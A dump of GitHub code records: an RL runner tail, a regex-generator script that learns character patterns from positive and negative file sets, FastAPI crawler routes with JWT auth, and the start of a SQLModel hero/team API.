self.reward_f.reward([r_obs],[action*(1-self.same_colours)])\n #reward = r_fetched[0][0,0] #-r_fetched[0][0,1] #if reward is binary class.\n reward = r_fetched[0][0]\n irl_rewards.append(reward)\n r_features = r_fetched[2] if reward_type == 'lstm' else [None]\n rollout.add(last_state, action, reward, value_, terminal, last_features,r_features)\n else:\n rollout.add(last_state, action, reward, value_, terminal, last_features)\n\n # collect the experience\n\n length += 1\n rewards += actual_reward\n\n last_state = state\n last_features = features\n\n if info:\n summary = tf.Summary()\n for k, v in info.items():\n summary.value.add(tag=k, simple_value=float(v))\n if self.reward_f is not None:\n summary.value.add(tag=\"global/discriminator_reward\", simple_value=float(reward))\n summary.value.add(tag=\"global/discriminator_reward_variance\", simple_value=np.var(irl_rewards))\n self.summary_writer.add_summary(summary, self.policy.global_step.eval())\n self.summary_writer.flush()\n\n timestep_limit = self.env.spec.tags.get('wrapper_config.TimeLimit.max_episode_steps')\n if terminal or length >= timestep_limit:\n terminal_end = True\n if length >= timestep_limit or not self.env.metadata.get('semantics.autoreset'):\n last_state = self.env.reset()\n last_features = self.policy.get_initial_features() if self.policy.type == 'lstm' else [None]\n if policy_type == 'conv':\n p_obs = np.zeros(self.policy.ob_space[:-1] + (p_mem_size,))\n if external_reward:\n if shared is False and reward_type == 'lstm':\n r_features = self.reward_f.get_initial_features()\n elif shared is True and reward_type == 'lstm':\n last_features, r_features = self.policy.get_initial_features()\n else:\n r_features = [None]\n if reward_type == 'conv':\n r_mem_size = self.reward_f.mem_size\n r_obs = np.zeros(self.reward_f.ob_space[:-1] + (r_mem_size,))\n else:\n r_obs = last_state\n print(\"Episode finished. Sum of rewards: %d. Length: %d\" % (rewards, length))\n #with tf.device(tf.train.replica_device_setter(1)):\n if external_reward:\n print(\"IRL REWARDS: {}. Average: {}\".format(np.sum(irl_rewards),np.mean(irl_rewards)))\n if len(irl_rewards) > 0:\n print(\"Max reward {}\".format(np.amax(irl_rewards)))\n irl_rewards=[]\n\n length = 0\n rewards = 0\n\n break\n\n if not terminal_end:\n rollout.r = self.policy.value([p_obs], *last_features)\n\n # once we have enough experience, yield it, and have the ThreadRunner place it on a queue\n yield rollout\n\n\ndef recording_runner(env, policy, num_local_steps, summary_writer, render):\n \"\"\"\n A thread runner that records the best and worse trajectories of the thread\n \"\"\"\n recorder = DemonstrationManager(\"../data/pong/demonstrations\")\n recorder_failure = DemonstrationManager(\"../data/pong/demonstrations_failure\")\n last_state = env.reset()\n last_features = policy.get_initial_features()\n length = 0\n rewards = 0\n demonstration = PartialRollout()\n while True:\n terminal_end = False\n rollout = PartialRollout()\n for _ in range(num_local_steps):\n fetched = policy.act([last_state], *last_features)\n action, value_, features = fetched[0], fetched[1], fetched[2:]\n\n\n # argmax to convert from one-hot\n state, reward, terminal, info = env.step(action.argmax())\n if render:\n env.render()\n\n rollout.add(last_state, action, reward, value_, terminal, last_features)\n\n demonstration.add(last_state, action, reward, value_, terminal, last_features)\n\n length += 1\n rewards += reward\n\n last_state = state\n last_features = features\n\n if info:\n summary = tf.Summary()\n for k, v in info.items():\n summary.value.add(tag=k, simple_value=float(v))\n summary_writer.add_summary(summary, policy.global_step.eval())\n summary_writer.flush()\n\n timestep_limit = env.spec.tags.get('wrapper_config.TimeLimit.max_episode_steps')\n if terminal or length >= timestep_limit:\n terminal_end = True\n if length >= timestep_limit or not env.metadata.get('semantics.autoreset'):\n last_state = env.reset()\n last_features = policy.get_initial_features()\n print(\"Episode finished. Sum of rewards: %d. Length: %d\" % (rewards, length))\n recorder.append_to_best(demonstration)\n recorder_failure.append_to_worst(demonstration)\n demonstration = PartialRollout()\n length = 0\n rewards = 0\n break\n\n if not terminal_end:\n rollout.r = policy.value([last_state], *last_features)\n\n # once we have enough experience, yield it, and have the ThreadRunner place it on a queue\n yield rollout", "repo_name": "KyriacosShiarli/gailf", "sub_path": "src/runner.py", "file_name": "runner.py", "file_ext": "py", "file_size_in_byte": 11073, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "threading.Thread", "line_number": 10, "usage_type": "attribute"}, {"api_name": "threading.Thread.__init__", "line_number": 17, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 17, "usage_type": "attribute"}, {"api_name": "six.moves.queue.Queue", "line_number": 19, "usage_type": "call"}, {"api_name": "six.moves.queue", "line_number": 19, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 94, "usage_type": "call"}, {"api_name": "helpers.PartialRollout", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.amin", "line_number": 119, "usage_type": "call"}, {"api_name": "tensorflow.Summary", "line_number": 151, "usage_type": "call"}, {"api_name": "numpy.var", "line_number": 156, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 167, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 177, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 183, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 183, "usage_type": "call"}, {"api_name": "numpy.amax", "line_number": 185, "usage_type": "call"}, {"api_name": "demonstration_manager.DemonstrationManager", "line_number": 204, "usage_type": "call"}, {"api_name": "demonstration_manager.DemonstrationManager", "line_number": 205, "usage_type": "call"}, {"api_name": "helpers.PartialRollout", "line_number": 210, "usage_type": "call"}, {"api_name": "helpers.PartialRollout", "line_number": 213, "usage_type": "call"}, {"api_name": "tensorflow.Summary", "line_number": 235, "usage_type": "call"}, {"api_name": "helpers.PartialRollout", "line_number": 250, "usage_type": "call"}]} +{"seq_id": "36623302224", "text": "import re\r\nimport hashlib\r\nimport io\r\nimport argparse\r\nfrom math import log\r\nfrom math import ceil\r\nfrom os import listdir\r\nfrom os.path import isfile, isdir, join\r\n\r\n\r\n\r\nclass RegexReport:\r\n def __init__(self):\r\n #Key is scope number, value is array of regex in that scope\r\n self.regStr = {}\r\n #Each element is line of text in the detailed report\r\n self.reportText = []\r\n\r\n\r\nclass Corpus:\r\n def __init__(self, window):\r\n self.corpusFiles = {}\r\n self.corpusTerms = {}\r\n self.window = window\r\n self.regStrList = []\r\n self.corpusNegFiles = {}\r\n self.corpusNegTerms = {}\r\n \r\n\r\n def Update(self):\r\n self.UpdatePos()\r\n self.UpdateNeg()\r\n \r\n def UpdatePos(self):\r\n self.corpusTerms = {}\r\n for file in list(self.corpusFiles):\r\n for x in list(self.corpusFiles[file].terms):\r\n if( self.corpusFiles[file].terms[x].Value not in self.corpusTerms ):\r\n self.corpusTerms[self.corpusFiles[file].terms[x].Value] = Term( self.corpusFiles[file].terms[x].Value )\r\n else:\r\n self.corpusTerms[self.corpusFiles[file].terms[x].Value].Count = 1 + self.corpusTerms[self.corpusFiles[file].terms[x].Value].Count\r\n self.corpusTerms[self.corpusFiles[file].terms[x].Value].Neighbors = self.corpusFiles[file].terms[x].Neighbors + self.corpusTerms[self.corpusFiles[file].terms[x].Value].Neighbors\r\n \r\n def UpdateNeg(self):\r\n self.corpusNegTerms = {}\r\n for file in list(self.corpusNegFiles):\r\n for x in list(self.corpusNegFiles[file].terms):\r\n if( self.corpusNegFiles[file].terms[x].Value not in self.corpusNegTerms ):\r\n self.corpusNegTerms[self.corpusNegFiles[file].terms[x].Value] = Term( self.corpusNegFiles[file].terms[x].Value )\r\n else:\r\n self.corpusNegTerms[self.corpusNegFiles[file].terms[x].Value].Count = 1 + self.corpusNegTerms[self.corpusNegFiles[file].terms[x].Value].Count\r\n self.corpusNegTerms[self.corpusNegFiles[file].terms[x].Value].Neighbors = self.corpusNegFiles[file].terms[x].Neighbors + self.corpusNegTerms[self.corpusNegFiles[file].terms[x].Value].Neighbors\r\n\r\n def AddPosFile(self, fullName):\r\n f = open(fullName, \"br\")\r\n binary = f.read()\r\n sha256 = hashlib.sha256(binary).hexdigest()\r\n f = io.open(fullName, mode=\"r\", encoding=\"utf-8\")\r\n NewTermsList = f.read()\r\n CurFile = File(sha256,fullName)\r\n\r\n num = 0\r\n while ( num < ( len(NewTermsList) - 1) ):\r\n if( NewTermsList[num] not in CurFile.terms ):\r\n NewTerm = Term( NewTermsList[num] )\r\n CurFile.terms[NewTermsList[num]] = NewTerm\r\n else:\r\n CurFile.terms[NewTermsList[num]].Count = 1 + CurFile.terms[NewTermsList[num]].Count\r\n\r\n\r\n #get neighbor words, before and after if applicapble\r\n prevNum = num - self.window\r\n nextNum = num + self.window\r\n while( prevNum < num):\r\n if( prevNum > 0 ):\r\n # get the value of the 4-digit Unicode in \\uhhhh format\r\n UniHex = str(\"\\\\\\\\\") + \"x{\" + str(format( ord(NewTermsList[prevNum]), '04x')) +\"}\"\r\n position = prevNum - num\r\n CurFile.terms[NewTermsList[num]].Neighbors.append((NewTermsList[prevNum],position,UniHex))\r\n prevNum = prevNum + 1\r\n while( nextNum > num ):\r\n if( nextNum < ( len(NewTermsList) - 1) ):\r\n # get the value of the 4-digit Unicode in \\uhhhh format\r\n UniHex = str(\"\\\\\\\\\") + \"x{\" + str(format( ord(NewTermsList[nextNum]), '04x')) +\"}\"\r\n position = nextNum - num\r\n CurFile.terms[NewTermsList[num]].Neighbors.append((NewTermsList[nextNum],position,UniHex))\r\n nextNum = nextNum - 1\r\n\r\n num = num + 1\r\n\r\n self.corpusFiles[CurFile.sha256] = CurFile\r\n f.close()\r\n NewTermsList = \"\"\r\n\r\n def AddNegFile(self, fullName):\r\n f = open(fullName, \"br\")\r\n binary = f.read()\r\n sha256 = hashlib.sha256(binary).hexdigest()\r\n f = io.open(fullName, mode=\"r\", encoding=\"utf-8\")\r\n NewTermsList = f.read()\r\n CurFile = File(sha256,fullName)\r\n\r\n num = 0\r\n while ( num < ( len(NewTermsList) - 1) ):\r\n if( NewTermsList[num] not in CurFile.terms ):\r\n NewTerm = Term( NewTermsList[num] )\r\n CurFile.terms[NewTermsList[num]] = NewTerm\r\n else:\r\n CurFile.terms[NewTermsList[num]].Count = 1 + CurFile.terms[NewTermsList[num]].Count\r\n\r\n\r\n #get neighbor words, before and after if applicapble\r\n prevNum = num - self.window\r\n nextNum = num + self.window\r\n while( prevNum < num):\r\n if( prevNum > 0 ):\r\n # get the value of the 4-digit Unicode in \\uhhhh format\r\n UniHex = str(\"\\\\\\\\\") + \"x{\" + str(format( ord(NewTermsList[prevNum]), '04x')) +\"}\"\r\n position = prevNum - num\r\n CurFile.terms[NewTermsList[num]].Neighbors.append((NewTermsList[prevNum],position,UniHex))\r\n prevNum = prevNum + 1\r\n while( nextNum > num ):\r\n if( nextNum < ( len(NewTermsList) - 1) ):\r\n # get the value of the 4-digit Unicode in \\uhhhh format\r\n UniHex = str(\"\\\\\\\\\") + \"x{\" + str(format( ord(NewTermsList[nextNum]), '04x')) +\"}\"\r\n position = nextNum - num\r\n CurFile.terms[NewTermsList[num]].Neighbors.append((NewTermsList[nextNum],position,UniHex))\r\n nextNum = nextNum - 1\r\n\r\n num = num + 1\r\n\r\n self.corpusNegFiles[CurFile.sha256] = CurFile\r\n f.close()\r\n NewTermsList = \"\"\r\n\r\n def GenerateRegStrList(self):\r\n NegativeTerms = list(self.corpusNegTerms)\r\n for x in list(self.corpusTerms): \r\n posSet = [None for x in range((self.window * 2 ) + 1) ]\r\n negSet = [None for x in range((self.window * 2 ) + 1) ]\r\n regexStr = \"\"\r\n num = -1 * self.window\r\n order = []\r\n if x in NegativeTerms:\r\n #Add the anchor value to the array\r\n negSet[0] = {\"\\\\\" + self.corpusNegTerms[x].UniHex: (self.corpusNegTerms[x].Value,0,\"\\\\\" + self.corpusNegTerms[x].UniHex)}\r\n for y in self.corpusNegTerms[x].Neighbors:\r\n if( negSet[y[1]] == None ):\r\n newDict = {}\r\n newDict[y[2]] = 1\r\n negSet[y[1]] = newDict\r\n else:\r\n if y[2] not in list(negSet[y[1]]):\r\n negSet[y[1]][y[2]] = 1\r\n else:\r\n negSet[y[1]][y[2]] = negSet[y[1]][y[2]] + 1 \r\n \r\n #Add the key value to the array\r\n posSet[0] = {self.corpusTerms[x].UniHex: (self.corpusTerms[x].Value,0,self.corpusTerms[x].UniHex)}\r\n for y in self.corpusTerms[x].Neighbors:\r\n if( posSet[y[1]] == None ):\r\n newDict = {}\r\n newDict[y[2]] = 1\r\n posSet[y[1]] = newDict\r\n else:\r\n if y[2] not in list(posSet[y[1]]):\r\n posSet[y[1]][y[2]] = 1\r\n else:\r\n posSet[y[1]][y[2]] = posSet[y[1]][y[2]] + 1\r\n \r\n while num <= self.window:\r\n order.append( num)\r\n num = num + 1\r\n badRegexStr = False\r\n for index in order:\r\n if posSet[index] != None:\r\n sortedkeys = sorted(posSet[index], key=posSet[index].get, reverse=True) \r\n regexStr = regexStr + \"[\"\r\n charAdded = 0\r\n if index != 0:\r\n for x in sortedkeys:\r\n if negSet[index] != None and x not in list(negSet[index]):\r\n regexStr = regexStr + x\r\n charAdded = charAdded + 1\r\n elif negSet[index] == None or negSet[index][x] == None: \r\n regexStr = regexStr + x\r\n charAdded = charAdded + 1\r\n else:\r\n pass\r\n if charAdded == 0:\r\n badRegexStr = True\r\n regexStr = regexStr + \"]\"\r\n else:\r\n regexStr = regexStr + list(posSet[index])[0]\r\n regexStr = regexStr + \"]\"\r\n\r\n #print( regexStr )\r\n #print( index, len(list(posSet[index])) )\r\n if not badRegexStr:\r\n #print( regexStr )\r\n self.regStrList.append(regexStr)\r\n\r\n def GenerateRegexReport(self):\r\n self.Update()\r\n self.GenerateRegStrList() \r\n\r\n #check if postitive files exist\r\n for x in list(self.corpusFiles):\r\n if not isfile(self.corpusFiles[x].fullName):\r\n print(\"ERROR: File no longer exists: \" + self.corpusFiles[x].fullName )\r\n exit(-1)\r\n #check if negative files exist\r\n for x in list(self.corpusNegFiles):\r\n if not isfile(self.corpusNegFiles[x].fullName):\r\n print(\"ERROR: File no longer exists: \" + self.corpusNegFiles[x].fullName )\r\n exit(-1)\r\n\r\n regStr = {self.window : [] }\r\n reportText = []\r\n reportText.append(\"################ Begin Scope Size:\" + str(self.window) + \" ################\")\r\n reportText.append(\"###### Begin Pre-Prune Test ######\")\r\n posResults = {}\r\n posHits = {}\r\n negResults = {}\r\n negHits = {}\r\n badSet = []\r\n posScore = 0\r\n negScore = 0\r\n reportText.append(\"# Number of regStr in regStrList before pruning: \" + str(len(self.regStrList)))\r\n for x in list(self.corpusFiles):\r\n fullName = self.corpusFiles[x].fullName\r\n \r\n reportText.append( \"### Begin File: \" + fullName )\r\n f = io.open(fullName, mode=\"r\", encoding=\"utf-8\")\r\n text = f.read()\r\n num = 0\r\n score = 0\r\n while num < len(self.regStrList):\r\n pattern = re.compile(self.regStrList[num])\r\n patternScore = len(re.findall(pattern, text))\r\n if num not in list(posResults):\r\n posResults[num] = patternScore\r\n else:\r\n posResults[num] = posResults[num] + patternScore\r\n if num not in list(posHits):\r\n posHits[num] = 1\r\n else:\r\n posHits[num] = posHits[num] + 1\r\n reportText.append( \"# regStr Score: \" + str(patternScore) + \" regStr: \" + self.regStrList[num] )\r\n score = score + patternScore\r\n posScore = posScore + patternScore\r\n num = num + 1\r\n reportText.append( \"# Overall Score: \" + str(score) )\r\n reportText.append( \"### End File: \" + fullName )\r\n\r\n for x in list(self.corpusNegFiles):\r\n fullName = self.corpusNegFiles[x].fullName\r\n reportText.append( \"### Begin File: \" + fullName )\r\n f = io.open(fullName, mode=\"r\", encoding=\"utf-8\")\r\n text = f.read()\r\n num = 0\r\n score = 0\r\n while num < len(self.regStrList):\r\n pattern = re.compile(self.regStrList[num])\r\n patternScore = len(re.findall(pattern, text))\r\n if num not in list(negResults):\r\n negResults[num] = patternScore\r\n else:\r\n negResults[num] = negResults[num] + patternScore\r\n if num not in list(negHits):\r\n negHits[num] = 1\r\n else:\r\n negHits[num] = negHits[num] + 1\r\n reportText.append( \"# regStr Score: \" + str(patternScore) + \" regStr: \" + self.regStrList[num] )\r\n score = score + patternScore\r\n negScore = negScore + patternScore\r\n num = num + 1\r\n reportText.append( \"# Overall Score: \" + str(score) )\r\n reportText.append( \"### End File: \" + fullName )\r\n reportText.append(\"###### End Pre-Prune Test ######\")\r\n\r\n num = 0\r\n if posScore == 0:\r\n reportText.append(\"# Zero hits in the positive files for the regStr generated for this scope. Try again with a smaller scope value.\") \r\n else:\r\n hitTF = {}\r\n #Prune weak regStr \r\n while num < len(self.regStrList):\r\n posTF = posResults[num] / posScore\r\n if negScore != 0:\r\n negTF = negResults[num] / negScore\r\n else:\r\n negTF = 0\r\n \r\n if negScore != 0 and posTF <= negTF:\r\n badSet.append(num)\r\n elif negScore != 0 and posResults[num] <= negResults[num]:\r\n badSet.append(num)\r\n else:\r\n #Prune longer regStr that have same performance as a shorter regStr \r\n if posTF in list(hitTF):\r\n if len(self.regStrList[hitTF[posTF]]) > len(self.regStrList[num]):\r\n badSet.append(hitTF[posTF])\r\n hitTF[posTF] = num\r\n else:\r\n badSet.append(num)\r\n else:\r\n hitTF[posTF] = num\r\n num = num + 1\r\n\r\n reportText.append(\"###### Begin Post-Prune Test ######\")\r\n reportText.append(\"# Number of regStr in regStrList after pruning: \" + str(len(self.regStrList) - len(badSet)))\r\n \r\n for x in list(self.corpusFiles):\r\n fullName = self.corpusFiles[x].fullName\r\n reportText.append( \"### Begin File: \" + fullName )\r\n f = io.open(fullName, mode=\"r\", encoding=\"utf-8\")\r\n text = f.read()\r\n num = 0\r\n score = 0\r\n while num < len(self.regStrList):\r\n if num not in badSet:\r\n pattern = re.compile(self.regStrList[num])\r\n patternScore = len(re.findall(pattern, text))\r\n reportText.append( \"# regStr Score: \" + str(patternScore) + \" regStr: \" + self.regStrList[num] )\r\n score = score + patternScore\r\n num = num + 1\r\n reportText.append( \"# Overall Score: \" + str(score) )\r\n reportText.append( \"### End File: \" + fullName )\r\n\r\n for x in list(self.corpusNegFiles):\r\n fullName = self.corpusNegFiles[x].fullName\r\n reportText.append( \"### Begin File: \" + fullName )\r\n f = io.open(fullName, mode=\"r\", encoding=\"utf-8\")\r\n text = f.read()\r\n num = 0\r\n score = 0\r\n while num < len(self.regStrList):\r\n if num not in badSet:\r\n pattern = re.compile(self.regStrList[num])\r\n patternScore = len(re.findall(pattern, text))\r\n reportText.append( \"# regStr Score: \" + str(patternScore) + \" regStr: \" + self.regStrList[num] )\r\n score = score + patternScore\r\n num = num + 1\r\n reportText.append( \"# Overall Score: \" + str(score) )\r\n reportText.append( \"### End File: \" + fullName )\r\n reportText.append(\"###### End Post-Prune Test ######\")\r\n reportText.append(\"################ End Scope Size:\" + str(self.window) + \" ################\")\r\n \r\n num = 0\r\n while num < len(self.regStrList):\r\n if num not in badSet:\r\n regStr[self.window].append(self.regStrList[num])\r\n num = num + 1\r\n return regStr, reportText\r\n\r\n\r\n\r\nclass File:\r\n def __init__(self, sha256, name):\r\n self.sha256 = sha256\r\n self.fullName = name\r\n self.terms = {}\r\n\r\n def __eq__(self, other):\r\n return self.sha256 == other.sha256\r\n \r\n\r\n\r\nclass Term:\r\n def __init__(self, Value ):\r\n self.Value = Value\r\n self.Neighbors = []\r\n self.Count = 1\r\n self.UniHex = str(\"\\\\\\\\\") + \"x{\" + str(format( ord(Value), '04x')) +\"}\"\r\n \r\n def __eq__(self, other):\r\n return self.Value == other.Value\r\n\r\n\r\nif __name__ == \"__main__\":\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('-p', '--positive', type=str, help='Directory containing files for the Positive set (what you want to detect)', required=True)\r\n parser.add_argument('-n', '--negative', type=str, help='Directory containing files for the Negative set (what you *dont* want to detect)', default=\"\")\r\n parser.add_argument('-o', '--output', type=str, help='Output file name, where the training report and results will be sent. Appends output if file exists already.', required=True)\r\n parser.add_argument('-s', '--scope', type=int, help='Number of characters included before AND after the key character. A higher number in scope will increase RAM usage! Defaults to 3', default=3)\r\n parser.add_argument(\"-r\", \"--rerun\", action=\"store_true\", help=\"After first run, decrement the scope and re-run until scope is zero\")\r\n parser.add_argument(\"-d\", \"--detail\", action=\"store_true\", help=\"Increase report output details, shows per regStr per file scores, file total scores, and results from before AND after pruning\")\r\n parser.add_argument(\"-f\", \"--force\", action=\"store_true\", help=\"Force proceed when -s/--scope is greater than 5\")\r\n args = parser.parse_args()\r\n\r\n #Validate supplied args\r\n if not isdir(args.positive):\r\n print(\"ERROR: Directory does not exist : \" + args.positive )\r\n exit(-1)\r\n if args.negative != \"\" and not isdir(args.negative):\r\n print(\"ERROR: Directory does not exist : \" + args.negative )\r\n exit(-1)\r\n if not args.force and args.scope > 5 :\r\n print(\"WARNING: scope is greater than 5 which will use more RAM, add -f/--force flag to proceed\")\r\n exit(-2)\r\n if args.scope <= 0 :\r\n print(\"ERROR: scope is less than 1. Scope needs to be between 1 and 5, if greater than 5 add -f/--force flag to proceed\")\r\n exit(-1)\r\n\r\n outputFile = open(args.output,\"a+\")\r\n \r\n\r\n #Create a new RegexReport for this run\r\n newReport = RegexReport()\r\n \r\n\r\n if args.rerun:\r\n runNum = args.scope\r\n minNum = 1\r\n else:\r\n runNum = args.scope\r\n minNum = args.scope\r\n \r\n while( runNum >= minNum ):\r\n #start with supplied window scope \r\n NewCorpus = Corpus(runNum)\r\n\r\n mypath = args.positive\r\n onlyfiles = [f for f in listdir(mypath) if isfile(join(mypath, f))]\r\n for fullName in onlyfiles:\r\n fullName = mypath + fullName\r\n NewCorpus.AddPosFile(fullName)\r\n \r\n if args.negative != \"\":\r\n mypath = args.negative\r\n onlyfiles = [f for f in listdir(mypath) if isfile(join(mypath, f))]\r\n for fullName in onlyfiles:\r\n fullName = mypath + fullName\r\n NewCorpus.AddNegFile(fullName)\r\n \r\n curReport = NewCorpus.GenerateRegexReport()\r\n \r\n for x in curReport[1]:\r\n newReport.reportText.append(x)\r\n newReport.regStr[NewCorpus.window] = curReport[0][NewCorpus.window]\r\n \r\n runNum = runNum - 1\r\n\r\n #Write Report\r\n if args.detail:\r\n for line in newReport.reportText:\r\n outputFile.write(line + \"\\n\")\r\n outputFile.write(\"############ Begin RegStr Output ############\\n\")\r\n for x in list(newReport.regStr):\r\n outputFile.write(\"###### Begin Scope Output: \" + str(x) + \" ######\\n\")\r\n for y in newReport.regStr[x]:\r\n outputFile.write(y + \"\\n\")\r\n outputFile.write(\"###### End Scope Output: \" + str(x) + \" ######\\n\") \r\n outputFile.write(\"############ End RegStr Output ############\\n\")\r\n\r\n\r\n\r\n\r\n", "repo_name": "infosecsmith/file-analysis", "sub_path": "RegexGenerator.py", "file_name": "RegexGenerator.py", "file_ext": "py", "file_size_in_byte": 20611, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "hashlib.sha256", "line_number": 57, "usage_type": "call"}, {"api_name": "io.open", "line_number": 58, "usage_type": "call"}, {"api_name": "hashlib.sha256", "line_number": 98, "usage_type": "call"}, {"api_name": "io.open", "line_number": 99, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 209, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 214, "usage_type": "call"}, {"api_name": "io.open", "line_number": 234, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 239, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 240, "usage_type": "call"}, {"api_name": "io.open", "line_number": 259, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 264, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 265, "usage_type": "call"}, {"api_name": "io.open", "line_number": 317, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 323, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 324, "usage_type": "call"}, {"api_name": "io.open", "line_number": 334, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 340, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 341, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 382, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 393, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 396, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 425, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 425, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 425, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 432, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 432, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 432, "usage_type": "call"}]} +{"seq_id": "3718275408", "text": "from fastapi import APIRouter, Depends, status\nfrom fastapi.exceptions import HTTPException\nfrom fastapi_jwt_auth import AuthJWT\nfrom schema.api_schema import crawlInput\nfrom crawler.crawler import dyn_crawl\nfrom db.database import Session, engine\nfrom db.models import History\nimport datetime\n\n\n# create db session \nsession = Session(bind=engine)\n\n\n# creatte crawler router instance for web crawler\ncrawler_router = APIRouter(\n prefix='/crawl',\n tags=['CRAWL']\n)\n\n# crawl route\n@crawler_router.get('/crawl' ,status_code=status.HTTP_200_OK)\nasync def crawl(crawl_values: crawlInput, Authorize: AuthJWT=Depends()): \n \n \"\"\"\n ## crawl google scholar \n This requires the following\n ```\n keyword:str\n no_of_article:int\n allow_links:bool\n allow_authors:bool\n allow_summary:bool\n ```\n It also requires an access token from login.\n \"\"\"\n \n try:\n # request access token from authorized user\n Authorize.jwt_required()\n\n except Exception as e:\n raise HTTPException(status_code=status.HTTP_401_UNAUTHORIZED, \n detail='unauthorized token')\n\n # crawl google scholar with user defined requirements\n result = dyn_crawl(keyword=crawl_values.keyword, no_articles=int(crawl_values.no_of_article),\n links=crawl_values.allow_links, author=crawl_values.allow_authors, \n summary=crawl_values.allow_summary)\n \n current_user = Authorize.get_jwt_subject()\n \n # record user crawler history to db\n new_history=History(\n username=current_user,\n keyword=crawl_values.keyword,\n date=datetime.datetime.now(datetime.timezone.utc)\n )\n session.add(new_history)\n\n session.commit()\n return {\"result\": result }\n \n\n# history route \n@crawler_router.get('/history' ,status_code=status.HTTP_200_OK)\nasync def history(Authorize: AuthJWT=Depends()): \n\n \"\"\"\n ## user crawl history\n This queries a users crawl history from database. It requires a access token from login.\n \"\"\"\n try:\n # request access token from authorized user\n Authorize.jwt_required()\n\n except Exception as e:\n raise HTTPException(status_code=status.HTTP_401_UNAUTHORIZED, \n detail='unauthorized token')\n \n current_user = Authorize.get_jwt_subject()\n\n # query db for specific user's crawler history\n hist_data = session.query(History.date, History.keyword).filter(History.username == current_user).all()\n\n return {f\"history data for {current_user}\": hist_data}\n \n\n", "repo_name": "Bee0933/scholar-api", "sub_path": "api/crawl_routes.py", "file_name": "crawl_routes.py", "file_ext": "py", "file_size_in_byte": 2723, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "db.database.Session", "line_number": 12, "usage_type": "call"}, {"api_name": "db.database.engine", "line_number": 12, "usage_type": "name"}, {"api_name": "fastapi.APIRouter", "line_number": 16, "usage_type": "call"}, {"api_name": "schema.api_schema.crawlInput", "line_number": 23, "usage_type": "name"}, {"api_name": "fastapi_jwt_auth.AuthJWT", "line_number": 23, "usage_type": "name"}, {"api_name": "fastapi.Depends", "line_number": 23, "usage_type": "call"}, {"api_name": "fastapi.exceptions.HTTPException", "line_number": 43, "usage_type": "call"}, {"api_name": "fastapi.status.HTTP_401_UNAUTHORIZED", "line_number": 43, "usage_type": "attribute"}, {"api_name": "fastapi.status", "line_number": 43, "usage_type": "name"}, {"api_name": "crawler.crawler.dyn_crawl", "line_number": 47, "usage_type": "call"}, {"api_name": "db.models.History", "line_number": 54, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 57, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 57, "usage_type": "attribute"}, {"api_name": "datetime.timezone", "line_number": 57, "usage_type": "attribute"}, {"api_name": "fastapi.status.HTTP_200_OK", "line_number": 22, "usage_type": "attribute"}, {"api_name": "fastapi.status", "line_number": 22, "usage_type": "name"}, {"api_name": "fastapi_jwt_auth.AuthJWT", "line_number": 67, "usage_type": "name"}, {"api_name": "fastapi.Depends", "line_number": 67, "usage_type": "call"}, {"api_name": "fastapi.exceptions.HTTPException", "line_number": 78, "usage_type": "call"}, {"api_name": "fastapi.status.HTTP_401_UNAUTHORIZED", "line_number": 78, "usage_type": "attribute"}, {"api_name": "fastapi.status", "line_number": 78, "usage_type": "name"}, {"api_name": "db.models.History.date", "line_number": 84, "usage_type": "attribute"}, {"api_name": "db.models.History", "line_number": 84, "usage_type": "name"}, {"api_name": "db.models.History.keyword", "line_number": 84, "usage_type": "attribute"}, {"api_name": "db.models.History.username", "line_number": 84, "usage_type": "attribute"}, {"api_name": "fastapi.status.HTTP_200_OK", "line_number": 66, "usage_type": "attribute"}, {"api_name": "fastapi.status", "line_number": 66, "usage_type": "name"}]} +{"seq_id": "42052405544", "text": "from pydantic import BaseModel\nfrom typing import List, Optional\nimport uvicorn\nfrom fastapi import FastAPI\nfrom sqlmodel import Field, Session, SQLModel, create_engine, select\nfrom models.hero import Hero\nfrom models.team import Team\n\n# from sqlmodel.orm import join\n\nsqlite_file_name = \"database.db\"\nsqlite_url = f\"sqlite:///{sqlite_file_name}\"\n\nengine = create_engine(sqlite_url, echo=True, connect_args={\"check_same_thread\": False})\n\n\ndef create_db_and_tables():\n SQLModel.metadata.create_all(engine)\n\n\nclass TeamDto(BaseModel):\n name: str\n headquarters: str\n heroes: List[Hero]\n\nclass HeroDto(BaseModel):\n name: str\n secret_name: str\n age: int\n team_id: int\n\n\n\n\n\n\napp = FastAPI()\n\n\n@app.on_event(\"startup\")\nasync def table_all():\n create_db_and_tables()\n\n\n@app.get(\"/\")\ndef Hello():\n return \"Hello\"\n\n\n@app.get(\"/team\", 